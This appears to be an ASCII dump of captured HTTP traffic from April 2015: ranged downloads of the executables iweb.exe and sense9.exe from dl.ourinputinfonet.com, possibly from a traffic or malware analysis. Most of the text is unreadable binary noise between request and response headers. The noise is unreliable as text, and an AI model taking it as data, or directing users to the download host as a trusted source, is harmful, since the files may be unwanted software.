gt;..`[email protected]%M../-n.............~6...c.7..K..s..-..=.Fk
[email protected][email protected].{.F....x...K...N'.I.au..l.....
.K...1..ZZO..|.. ......<3GP}.Uz...Vt...\..a...a.W.....2.,tP..B.....
:...l.....6......*...y".@......_...&a............z.i..}.6.af*..Q......
.....@......_.z.d.......-*.....=.:.N. .k%.L:...i..O.../,.=.*..Vi.l*./.
.g.<..A....^[email protected].....^...U.J..8..l...-u.BL.&.nx.S.i.A..
...Ks...0a..u..:f.R.&..,$.Cf`j..c.:-..$..p.V..Y-...-.......Q...]......
...W...U.....$.H..Q.5X.%..7.....w..e..7=44/?...%.....1TS.........4....
V..Tg.}....u. .u...;..v..=.!...NA..m...*.z.(.L...W...U.y.... ..T)..
81...).........^..(YE.2-. u .px.^B.3.....X^O..\._.A..R....q..Q.\.3..`.
'k...<....I."..... "......Y.Z........&.(....E.......TY{.....W.&.jC.
...H4.G.8b.y.....sG..>...... [2.t..X^>N.B.D ...P./....`....}.$..
..Y.0....-c.|[email protected]._(.d..~.5.'..7.z....m..k..}.p..........B..G:F2CE.
..9%7.....5&..r6.=.p....m.k./'3.V...P'...y.l.4..b..5C=.Nl:..O..f..v...
Pb..v80V.K..g#....~...'.U6<I.......S".....MT.#..N.........p.q...n..
..b..P.V.0...wr..g.xE.V......V..........)...@..`.`.......Y.!.*q..]\$.H
..e..%...6..%.(w..0.i:[email protected]......=..>........Q.2l.MtJ1..i
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.....0T....?.....tt3.....D5.V......6.mX[o...J@..(G.0[....0w18.........
......:...s..%........R...Q.t.y...-...2[.5.k.I...U..s.kC....Q..i(!z...
>5...)D..o.....vF....IL.......l..L.x..k5.;..K.t..C.).h...y...J.....
....h[...p}.\*8)..jZ....L^[....?W....U.H.........oof=....>..)yP....
.#.I.@....{........w.....W..1e...l}O...YF..RU.X.R......6.&^....2.|....
..y<...........y....Q...)..f8..,$D.....G./*...........i...Q.n...g..
.....*.0(-....;.:..9s..v.._.....^...l. ..T. M....Q..........a.....**..
.4...6.Id......i38}>.......E.=.q./.....n.~.Jj.....r.$.8.b9.:..<q
.i.2ect....%.j........l8...%.:.....hft.z..R.KE..B...}Ky.{.Cp... `....~
W....(.Qm....o......n.u..-.,..!-.../..V.Va9.2..D..`{..6...~....b.6u.F.
4...yI.B.Z..s/[email protected].........@!...VAb..%.......\...6aT...".O..
.MI...dc.9......&u. ........Lt|.....m2T.H....7...~.V....zT....h.].....
....L}...wI.v.`.Qj<X.....d.....H..<.9.....`$.LB9.)^....B.zN$..].
N.Id.l.(-L.>.E.J...w.[....p..F8f..{V...#...j`.*.....#U=&.......0p..
5..2........P./.,.....#.~m|n..Pd [email protected]*R.F:.="..I.&
......N.V.".....;.....]c..0..;r.5.l\c..B..`...g...Zh..A..(...KpS.....l
....h.$.-]2.F.<......Gv. ^.........8l......0.. u*.@..%{......x0..h.
.(P.....D .\....<...3...l8_..[nB..VdBz...L.A....;.3Nk.. ..e.o.3Ed.Y
.Z^T........S....[=.1..{....o[_.2.,..l..D3.g.QF.7....%'.".Gx..~....mR.
....Q|.)?.I.....%.....A...(.........S<^..............6...%K.....tm.
..g1.>qx.DiF.A...z.7...p.>..p.#.1..........;{...&gy..0...Z./H^[.
bf.y.a....G.'i... d.vmk....pq..t\.......O...v.....w`..yQ`m.`......
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=51
Content-Length: 250000
Content-Range: bytes 4250000-4499999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400129.dop010.am4.t,1429400129.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
../7w....z..Z...kC=.5O...*.......1.....;....(^..m...5P%.9Y.w.i......R.
.6F.........P`n.#.p(...S....B.4>..B.W.nT.(M.. ....o...Slh|"...e...y
......n..w."3..5. .;.`j%)..h..R.U.-.....D.*.t.f..Z.......b..Tx.k.4*...
t...6.......?.....-.....C.%*.;3..H.......W..?.$..\w..].W...b]09.W.a.&g
t;_..3.c.....%u...pN....@[email protected]\[email protected]}..:Kvce...,..0].q..yU...Yj..Y
...:.g.^...sp.!n....2...wl..k1Fcb..\..RZ.\I.D....Ez.4...".BN6G....MT9.
..,...3....}.=.wZb....kY......D.e<[email protected]..?g..t..lX..H.m.{\..H|..|
..s..M].=../=A.\(....P:...4]....%.b...Px;..... d9H..H.$_......]R....q.
.2..\]hG...(..!..a.,.`6uF#.......s....h.... ..-....V...u..`.q........D
....7H...o.k_-.S.....9....C..pL.....7.. .!.#.....W..@....\W/.g.oRk....
....N...&..>p.K.wlH..c.X...G}[email protected]........>_...U...
..9 e.H.I.jRi....6\..L.w..:....u..nU)L].._....u..<.`..k.)....]...b.
.../....7...........[hU.............*.9&.............t ..f...i.9.5E.,E
..r..n....v.,...b'.%x.W......:Qkkx<H:...Y......tH.cS<.MS..K.....
!.....{O.C.s..W.YC.G.......Lf..'[email protected]......*..Y]@
.l..0i... I..^......n.m.<....:~...C......k..Z..BH..n.=.pr.O;8....s!
...... [email protected]..."=...:.,.......E...R....~H...n^gx.{..i.
[0....dvV...qz4.wh.1..i.....w".49..W....VPm....=%7.b#hg~p..U......N...
j5..==<..._....I..B8_.....~GK.....G.Yl\'w;l.tYqg)Z.C...8....b\..'p.
.....gXq(..%w#...-F....&....%.QnGt........z.A).([email protected].)G.
.%[v..f..*>.........6.U... f.k..<a..Ea*.Y...}..L.P..s...........
.......S7..,0r.y...}W......v..T0.l..1......2.)..`.....U.A.K.ls....
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



B...$....3..(xJ..=.z...#z........W...'.#Tjk`.L....f....'..L.Q.....}...
...uYAB.... .w..v....?.R..@..[....m.`.. q....X...#.t.......b..........
.....&-...V.MaI.......,......=.q...g.!..{...t..>......Y8....~Z..".D
}>..'.Y:.Y](s...].d........f........#..Q....Ku...I...u.....z..d....
-.R]f<.S......L..r.lg.-........T......4.R.......UP.Y...........D...
a.v/!.Kb!zW....B.?....%4$.....1..Go.3.d..2....N...j...V|O....'....x.\v
.]c....c....=<..v.....lx...-..s.J....v......X7:...u#.2.8V1...\NP4.a
..1.p.....u..m.z..6.`.0..Ci.......s....`>.g."...0/...g....0l..2..`.
.b.1..[E..|..|n5s..r<<]-8.= ...g'm..0I..a(.Y.1...V..F.IG.p..}.Q.
..<).Q.../ 2..^ ..R...e.$<.. k.p(G.......G|B.P.uUKH..../.g....6.
.9.....g..S..w.i...F...4Bq.=s%.7.Ag]iX.yi#......G.........P...9...B..R
.j.z.:...?..;rs.."-D..e8j.8.Z&......*..kIOA.B...\.E%.j.".t.sv...g.....
?.... ..j'..x....g..!...t....'.I1...7~.4..[[email protected]..<_w.
g.0C.K...\.J ..'[email protected]..>....g2..vQ..-Kby.IUf...k7
@}a-{.Zx?.|...;.5oD.]....8.c......Ia.r1..........ec.^;v......j.Q.v.tJ.
...Wwm..7..4i.......!..?...x^.M.n......<.......u..H.....J.. C.s....
.)...K...>ddT......HSk....99.;2.k.7......h...j...&MA...........1.X.
._...Y...a..D...a...MO........]Q.....w"m.W2..{,Q.B....H...d.....m.....
.5.... ...............9...\...9......g?...S\...hu...=~.....!..d..I.D..
...tW..C.${.0..Y t.`..?k.....Y.5.............m.......\.`g...u4........
U.^.....!q.hnt...Y.*..r..m....Sf.....l.....9..|..@.....[.L.....i(#....
.....H.s!~.!.........a=FP.1...{.w....:.....>i..........X...Jh..
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=51
Content-Length: 250000
Content-Range: bytes 5250000-5499999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400130.dop010.am4.t,1429400129.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
....


GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=5500000-5749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:30 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=50
Content-Length: 250000
Content-Range: bytes 5500000-5749999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400130.dop010.am4.t,1429400130.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
...L.H..n..y.........r........u.... ...n...O.&>..M.D.MDu.Zi.m3..Gu.
(...1.....g. 5:r..~`.... ./.............n.g.Q.........g...1........>
;....N..Q..._..,.E^Eg...250..$..rT.{.sq.HE....OC...H......r|L.^m.....F
.De..S..g...6.....T<..'[email protected]
..T|`..se/....y.....'}.......E....,0|.=.....Z&..........F....|.v.*....
..d.t....Q.6........).Y!&..GE...0.8G.....y...D\.)..ay.h..q.G*.=R......
....$E.~...5..n2*xX!.....{<.4.l;...E.... ....E..a..%B.2y.Vk......D.
a..........Qo&....q!..{.N.....8$H'...y=.:....&S..N....X[.d...8.[...J..
>...:.TO.....V.r.c......y.....c.I.S...Q|.S..H....R%Z.;O.\..].O....&
gt;$Wu..h..Xsv9...L..........s..9#..cT..Oy.f...T..G.-..w..}...C*x..f..
....a)29]..5.*...'...N.......a...<.E.U,...X..-.....D/.X>...A.1..
<x...&..h.b.......l.......o ..m.....xl...<*..A\..vX..........h..
.....ak....2..{1..c.iQ;.|....G{i.....c.k......_.aM^1..........m..2....
[email protected]?^X...F!..n...?...,y...u. ...Y.....CL..x..A.k.w.J=...97...
...M.....a.../C., mj.t.........d.L~.*k.-v..<aQ.5B...:..i..s...9.9..
....{~....b........:.N".,./.ZxZS...GNf{.F.uW......{..\.<.1.......OF
x..n.4...^.=..6......d<p.a...E...?t..|n...`.p..%...7....p.L..H.b]..
.A:..G..x..3IR..[..w%..!....Y.....A...L`..`.D-...O%Z.aZ...3eH`.o..qc..
5w..JUC..!.N.lX.....~..d.Rh.....Bn.6"xm]..4.....T..> .......t.IV..t
.5o.aRE.UxG.Wac.I.R(....4..{o.u<."v...HAW.R.|_...5....g9].(A5.ZR.. 
.7Z.>...#ldV.R..P_.Ehi.C.R.#y...%/a.4..b ...4..?.z%4.%...ZT.....v7.
.|5U..t...Y......@{ts-.K..-....]....M....Q..D.....6..kr.B.j?W.#...
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:30 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3329
Content-Length: 250000
Content-Range: bytes 4750000-4999999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400130.dop010.am4.t,1429400130.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
..,TA....^..z.a..O........t|.3..a.z..yX...G...P..X.....\....#....Nhb..
.p...}.[......Y.;.P,.............9?]..J/.CzM#..h....e..`[email protected]...
!.m..D~./U)..../....c.;?....&....'.I .Ac<.0..@."..$..<*.2{.,*-.q
t....i..,.lCtl(K..#]Ok..-F_yq..V....?F..M.#..m..o.,.....)q.OHN'N.9...w
.....Bv...s.e.c.u.E.7X..U) .#.v.l...!j.nI.B...'.k.|.....J...,s...QF)e.
.T.o-...kB"b......A.l..P ..R.Xe)Q2....Dj.7.0..{0..,..&....q.D.._k@<
#.S#..I.4jf.Yzg..$l!.e.B3v.m.b.$......6.*x`DkZ_...J........%..z-...u..
.M;........wx| ..M4.. ..D..8.R...".PH-7"e.Z......:.F..=L.....yl.....&g
t;.A8.|[email protected].(...ua^.&_.L.k.........g...;I?.... u*...km.a..;W%.........
Y.....|._....7?.xR.. .$.."..#.....7.O..Y....*.p.6._.hA<...L48<z.
4  ......[M...B.cn.....diL*..N....P..B......|LqK'.=...X.?->.|Iy7..a
W...\.E..A.......W.z4....6p...|...p*L(O.F.......!....*.y$N.[4....P..6.
.Q p`/.....6..f&f.6."5\....h..~3..c.4.[.=&....k/-.k.p...06h{E.. l..B:.
}..G..)...z.......q.....\..X.U...P..k....h.(I.....I...ue..T..2(53&.1Y.
S...w%........B2.../..!..x..S#5..q.v........L..w1.....A.0.9......).S..
..{|e.|..tN.....M... ....0....#..`9...<&.VB>`M.=........O.....e.
..J.c.\ x.0......m..v.X(.!..l....N.B;B..f.......p0&p..K.i..]..D.Y.....
{...BH....uj#..k$....6/......4.9E....j....|m.v'..Z.}..-..j...tCt.b.,..
.....oc.{...v2....E.4.4.. m....NA..G.kD1....[....`1Y)MpL.. RxG?.......
..Y...g....e.j...I......P..z!/........^..S...w.(.X.w.U...0......X...F.
..`.i.9..j.C.8m.p..........r...'..,(.#...r-@........:.M..ojbF...U..(.n
...yP7......Y..n".mv....N.s...U...3'.~. .c.Z..%.@%P....Wy.1..#;..@
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.k.~."...~.."...p...'.D.S.E...rE.:L.\%...5.V.KMJ..V..I./.]....i..hi..V
..~..X.Yo...M".4Q5.0.P?..V.GY..T.g.u..q.9}!lx.O=..Y......h.n.......Ro}
g.w..e.b.j6.3AAM.m......!.,..H.5.t....c}F.._.*.{(u....)..id.1.E\....o.
...`{./^.....O...;...`..........a.|.n.....0'aj(....e.[^......Z........
ID..S............vo.K.H.l.sw.!..R.W..~K.kWZ...d.....=...<.8zo....H@
-O.r1..W.....l/...4k..e..{*..#...........vKCu6.....A'.:>.Z7Wo..K..w
....Z.b.e.qf.W.m...M..5.^v....WM|...o.'.|..{c...V...=j...5\.D.........
8.4F=Z.......w.S.$$.......\..=.].N..B.....nF.....W..|.y!.<...W.....
..SV....!.!....*......$4....u....f"$..k.......V.w.c.5..f.,.v....M..?.,
.\..Ll..T......x}.....J.b..j....B.f.J..'..;P<..9?...?..A..%.1z..C..
m.....|s0..h..6....7...J.y...p.....t..Nd..;...jx....r.X..P_...`..P..Y.
)..=.lV../uy..7^....L.....#.s.l=r..Y%.b.....d./.*..9&k........c.S.....
..^<&.Tp.h.b......;.. WA<X..[..G_d7-.g...2...\.Tg.{. '....UW4L..
|...B.fL.....H.{[email protected]....]........I>.{.1..^x."....0....%.{...;.x._.
".~C.....{._Y.XF..4..T.9.{.0Gkd.QM .X..j.u-$.......b..nC.....3L.H..n.b
q'..iY.|.x[..o.n^.<...(.... .....a.R.G..............}.........^....
..T......XX{.F...J.-..}.W...G....E....7.[.wPY.....f.F3(...3m}6..$E.g#u
..<...tJ...A.3.D.s...])/ULr....."3.t.....af..M~.2}....S..U....q..1.
(..8.).....k.#.....4.[Y.6..^>..q..U.U.>......<N|.....i.A.....
....,7TT..z..............j%..........q..........l...M.X...}}.....8....
Iw....0..2o.q.d.X.3S.$v#.......~}T..{A.......J)..us...._..r...aZ#.8...
.........*#......<...L.w ....?...T.f...e....[.^..n.....'T......
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=6500000-6749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



.P..^.b-U.....c....s.e........./I....).X._$.(.xbec}.ZT.|. N....!..&...
.1.).A..x}[email protected].;q.... [email protected]..<.N..Y.;.?...F
[email protected]{J.....&..c....2..jb.q.O.[[.(.X...%?......Tm.O......jYC...G$
O......~C .9.y.%....V1.....g.. .O.exU..V...o..Gh.!A.....i.U.2....6V.._
]...I..O..q.T..... ...\6..uJr~J..C.;..G).....[.`.#[email protected]\
..z>W..v...q.......... u...... ..#.a..j.......{b..0......,6<.)..
tf....=`ITU.M._..3Xz.U.^j..8..E]]?e....o/.#.9...K.y4-;"..\9.z.a..n...C
..D..\L.L...m=..{...N..z...O.r76P......>;.;.M/....&Y..b.8.T...`h~..
..[.Z..Lf<.>...Y\...........E.*....#q..fQ...Dj....}..Y...s...{..
..u...].......M.....v..L......8.dnF.wY./9...n~ch!..=.8.x...Xy.4......J
..M..{j..C...../...#I.......;/Sy.3A.F.*..1<|....C..h<8..z......5
..0..#....m.\/BL... ...KP..P...........K.?..S..f.......Ml......P...w..
s...-..8;}`.n#..............q.]m...\;@F9....L.;..zEL%..a.B.......Y..n.
.............v...R....9T..]..xc....B~.d(.E...k.[U.. d?...=..:..../....
.....I.).1...xU.."......gy.[[email protected])V!u.@.......&....X.>....
..Y../eL...:..'............{..8...:.x...g2.h.W.b......s.=.E....&zz.Z..
..."..(.....v..7.2S.f].'..O(.b. *R.....p<D......zaw....j...Vv.7_.5.
.Vo.........FD3....@3...........["r....5.......<..0l1J.....!..M....
....h.o4...K....^d.O..r]......c...k<.....G..x.";hy....W..u q....{.p
h,R..&.LP.U%..`Wo.o.R..s9$i.:.4b.g.4..{...:...........m...j!..`i)3..A.
%..}.....J."n...1D.jcbp,.-(...}#.....j.'....yg.3*0.....>.iE. N....@
J..omn..\|.[i....74..X.......`.P...._....p.!.....o...Jo..[..~.;...
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=7250000-7499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=7500000-7749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



y'.....w..H>.1...........>.M.5..5]...P.N...c.'S.{.....E..o...|..
q..q~.hl./e.."..4.pWuB....=....W.za. m..S8C.....v.J.9.....,^.^P..x.l..
...R..E..F.........>..EM;.a.I..f..._4z...V"..M!.&.................A
e)7.?BS..W...[9!.,p}....&.]..H.u....mx..<..giy.._!..j..Ng....U.ff[.
[email protected].".....]N.s.*Ns...&.,.p.e.kc....g.Q......~;.."...,.4.?...N
b...5R.....1.. &..0$..;)[[email protected]#........Gqd3...=.P...{
(*....'[email protected].?..T....A.E.,nC;uB0....Cwe...iO.r(`z...............(...
G.V|`.."...|gX..f.?).Dv.Y"K._..J...l.....&..I] `U<...L.inq....=..6.
\.)..[.\.m..&..O..i|.c.}.>.W"?.SrR.5/.\q.[...\.`j....e....8$}.[..^.
.;Z.3R....4...:F.Q....}.....m...x..a)u..%....fy.. g|).}..#b<z...B..
6&.....l...b.i.m........N.z4594y.t$n.E.>...%...5.`7.BnR...AI...ks&g
t;.e.....9U...p..Z.:........]...GE..1^..%...s..u....0.=..Nv|.w.B...&F.
..b..........5....U.K.....|..<.6..j,[email protected]...
e..dt..<b.........a......K...a..i..P..E..K`d..E..p...Q.F.C{_t.E \EU
R.H.s ..LK.(,[email protected]..).9..w....(M....p.r.eq......`.[L.
.....Pl$Zg.e..T..&...(?.8.`.....F..a)H.. .........Vf7.<.my....G....
...{..j....E.F...*..kt..!.DP.....f.&..H.l...h..35U..<.\L......!.;.J
..a.>..5z.T.iQ.t'`.auR.,4-z.....a....{.|....#../!..`...._.._..e~...
.=..5.I;:.n....W../Zh;.kF.G..NA}...`.......==.......n..y(.}`.V {...!..
....N..i..N.O`..........:[email protected]...{.I$.Z.....=..16|.u.V6..9....H..
.;F..X2'R..>....u.......~....H..6_.u..dj....,.&U..etU.>t........
.p.S..>..Oz.h.js...c.h.q.KM([email protected].
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=7000000-7249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=8000000-8249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:32 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=48
Content-Length: 250000
Content-Range: bytes 8000000-8249999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400132.dop010.am4.t,1429400132.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
 ....s..Q7f....y....<..Tc~Q#.P....=|. H'r..'Z..<.4x!..e..s..Z..`
..9._...\`\...M.}z...g.we....4Z... Mm...6.....15.q..H.].=.F.T.y.^.T..'
 b.Y.........j.e.".2P..z2...z5|...[.15.;.(._........d.9..].VE....L.T..
[email protected]..[b..~p...|.G.Y8x)~.....x.Vv.......H.1.<@.....P".,(9L.?.
.ND5.........{|......:.p..@ .\.../..u'.j......W....~n...hU..=.."A.R.\5
.$JY..,...(.8....I.Um....~....7 ..[.....91.R...R...#....Sb....-.....6.
....S....h...%\.#.A.6.U[.y2.4.A].l.}.QW...g.&..%,..~h|w....bz7.u..r..B
sz.........A.`..I.E....S......t...L..$..%.<...6......U...f.".S.....
._5.I.....}.86P.w...Y.."....:...L`...X%~....0..V.8....gy.72~5...2 ..dc
...q3.D.Jk...I....=.5.C.l.a[....?.._.3.m...9..y.;....`.*.......(..C...
.*k|.......e....t.....E...B".Yg.B.....e.>{%..gN.....Be..C..}Ml..A.8
...........O.S.......G.2s.J......}. m...^.` R..#...][email protected]^.......*.
.......2.MM..|8./..O.. .Zp..t;E..k....J........L#..>.......U..(..3i
.%<.>v...:....h.....ya.(@.J..'..XA.M.....?..........O.ah...._...
..Fq(F...WY..m.....s..q.a.B.z.X~........p...5..ZX...`..x.V.*g9..m.....
....).q_...E....!O}......Z.k...'.S......^Y..7.flx........jD..."..~Ie2.
....1.Cf........?....H{I...q.3.. .....7.....W....Tw'....z..T.!.....`..
.....y.e.....$.NS.M...'l..e.o....&N?..y..N~.=.r..j^=......^P........&&
o.......~..r{..........G.......n....5j.S..5......G....N.H..r..-D.4..=}
x.>..t...(....F..g.J........KF............g. .O..^[.d..... ...H....
.-.D..K....%Q..'E.n.....\.....3Od.-......0.8).`O...H0..;L~?.../l..[..V
..:.4..5..X%.J.....z^..?r.Or.$=..W.S.1. 7.....se2......'vC......V.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=8500000-8749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=8000000-8249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



Z..=2..x.M1y..`...ma.............7_...9@.&S[$...h....ePA....Dwyz..*}..
.L.e...8...I.T...Q..p.....p.Yw.d`.....5..l~.nYgq).....oR....xw%..b..(.
.N...!v...tP.C..I .74.A..~~.\.Sy..vOc&S.WON...4....)..^.W.!y-.......0?
..7.4l.....U.....n..t5.{.....G..1...Mr...].......%n.....U..#X.C.?*U...
...<...!~.....O...z.......7b.e...........0...b.?....m........:xy.$6
-. !P.kms.... ....*GA....KXXI.(s6...z...!.qQ.i!...>....38.U} U/..&y
.....1.....p..a.V.P2G^8...;....(...cq...u...[...0..f7RvU......93.J.}..
.. TD.j....0.[....*?....k..?.....q.:.q...V...m.b.2..n........"1.U..;.o
 Ha.......d....z)[email protected]}.n.^......7.n..=."..n
.....R'#I..9....\.6'.m.. ...Ve....Q.b....WN.............D.?....:...J.f
kr.f..9..J...&..f........T.....4O.9........X...:9Y..,.s...q..?w.......
..].k...p...`25..V..K7@ P.6...wQ".\..|.P.s..?<.'..w..N..L..Y.=\Rk..
....DZ.}.....5_...9. .3/"[email protected]'.3.f.
....h.....k.... "..~......F.)....K.M.f8D.]\x.E#..,.X..i{.c.~Yiw..|..{.
..t..&ZWfV(!...~.#..-....v..Ij...-\h.E..#.}..%.B....4........3......W?
.q?..Q.L.z ....T:.N....}.....=.]R.j.d$(XBv.J#h....`...._....egt..<.
..vA..)2:..Ou...|u.M;...Orp[2..#..<.......b..7.P...G. .v..,.gkr/...
..Z."o..'.....u.>"..P.7Z.tm....t........ (...c.....(.....}Vx.{..]..
...JNC.a..=.a.....4.....[..'.r7TJ.(T..Y8.............S...T.T.6.....Qi.
.......*........%..{./......0`.~7.n.0L Ppn...|[email protected]....
L...4.8.WT.X{.....z..f.....a.).f0D. ........F6.gy.0...y]...WFG1.......
........{..................h....8..S.w.).:..k...$#[email protected]......
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=9250000-9499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



. ...S.......n....inN.X..7.....D..NcGAaV'..BRk...b5p&.xe./.#.Z........
df..G.k..).Z2...7:W.DL.F..oM..#y"..Q.ry..B..f.a...V.y`.G..G...-....iJ.
.z?.H.ET.hc.3#.......... .09.F$`&.C/..]{....;@.B..j/5.G.#...|&|.......
u......d#]..N....[..P..;.K.o...Qa.<.Q....N...t|.C.O...g'm...r..*1E.
..9..\NJ5.o.22..>..b.O|4kf..R...a.X...N...g.*.... .....*.u"[email protected]
..4 ).P=BtUA.q.I..#/x...7.V............F%bO.aW......|?..^E..;..P....Q.
..r.<.oV...}...3...PaU..b`....aNS.sS.^Ox2i]..|...6......x`,3.!.bI K
./[.......V.6*x.....l.\Q...Srr.....j..C....hk..o........(IT.Fr5..=..PU
..T.7..l7.nK..k...\....~.....L...R..._m....6....}..cs..5....}!.f\.]c.N
...\K.......D..A....Q.W.K.._bJ....]u..wZ.C[x.V....x1X3.}[email protected]
R....dE....7...B..{.`U.J..'.;..... !...N..D..l.....s.1.e...N..*^<9.
D.!..V.:. [email protected]>........n...f.u....dj.b;....7.
......y...:...g....'.,........C.y.&...1r...G.M..K.v.F..:G.,.'=...#.KG.
....3#...\20//KB.7.*...4....3.1..9...!....}51......,N........u....!a.b
#....V...nd I.._Ue.\w..48.....H..&...|.d.[j.b.q.O.N...u...9..; H....V.
...H!.M..'.c...........f .......[CS..cY?..c..l....<]..D..T...$1....
.....,-.?...Uf..P:O..2..9.K...z ..T.C.8.A...1.U....qV.=.....`0........
A...<".Gh...../.Q.............O>.Y......h..\..;.H...Z.q=.<CNY
....o....:...O..&...#.o....e..r.4TH...',._...../..o....RV.q..m..[/....
........2.wH..^.....'....j.@.[...X..-...wS...........G...o.?...H(...&l
t;.<....=...E.%]0. ../:P.....m.9...g...........2.I$...]..'5.4.ozr..
.~....p3...8...2......$<...=.................LV..=j-P..H.G...V.
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=8500000-8749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:32 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3327
Content-Length: 250000
Content-Range: bytes 8500000-8749999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400133.dop010.am4.t,1429400132.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
9Wb.b.c(X[=Li...jS....N.3[...$..t..>n\|..1.2.s9..g....Ox..;.>`P)
